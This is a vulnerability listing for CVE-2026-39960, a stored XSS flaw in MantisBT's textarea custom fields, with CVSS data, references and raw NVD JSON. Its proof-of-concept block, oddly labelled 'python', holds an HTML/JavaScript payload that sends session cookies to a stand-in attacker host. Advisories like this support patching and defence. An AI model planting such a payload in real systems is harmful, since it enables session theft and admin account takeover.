CVE-2026-39960

Description

Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page, (bug_update_page.php) allowing an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. This facilitates session theft, leading to admin account takeover, full project data access. In order to exploit this issue, a textarea-type custom field must be configured for the project, the attack must be carried out by an authenticated user with bug report permission (low privilege). This can affect any user viewing the bug edit form, including administrators. The issue has been fixed in version 2.28.2. If users cannot immediately upgrade, they can work around the issue by using the default Content-Security Policy, which blocks script execution.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mantis Bug Tracker <= 2.28.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept: Inject into textarea custom field -->
<img src=x onerror=alert('CVE-2026-39960')>
<script>
  // Example: Send session cookie to attacker
  var img = new Image();
  img.src = "http://attacker-server.com/steal?c=" + document.cookie;
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39960
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39960
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39960/
[4] VulDB https://vuldb.com/cve/CVE-2026-39960
[5] https://github.com/mantisbt/mantisbt/commit/5fec0f448b7a7d7d539a6adb6dccceac4e4e4ab7
[6] https://github.com/mantisbt/mantisbt/security/advisories/GHSA-qj6w-v29q-4rgx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39960", "sourceIdentifier": "[email protected]", "published": "2026-05-20T22:16:36.563", "lastModified": "2026-05-21T16:04:53.813", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page, (bug_update_page.php) allowing an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. This facilitates session theft, leading to admin account takeover, full project data access. In order to exploit this issue, a textarea-type custom field must be configured for the project, the attack must be carried out by an authenticated user with bug report permission (low privilege). This can affect any user viewing the bug edit form, including administrators. The issue has been fixed in version 2.28.2. If users cannot immediately upgrade, they can work around the issue by using the default Content-Security Policy, which blocks script execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/mantisbt/mantisbt/commit/5fec0f448b7a7d7d539a6adb6dccceac4e4e4ab7", "source": "[email protected]"}, {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-qj6w-v29q-4rgx", "source": "[email protected]"}]}}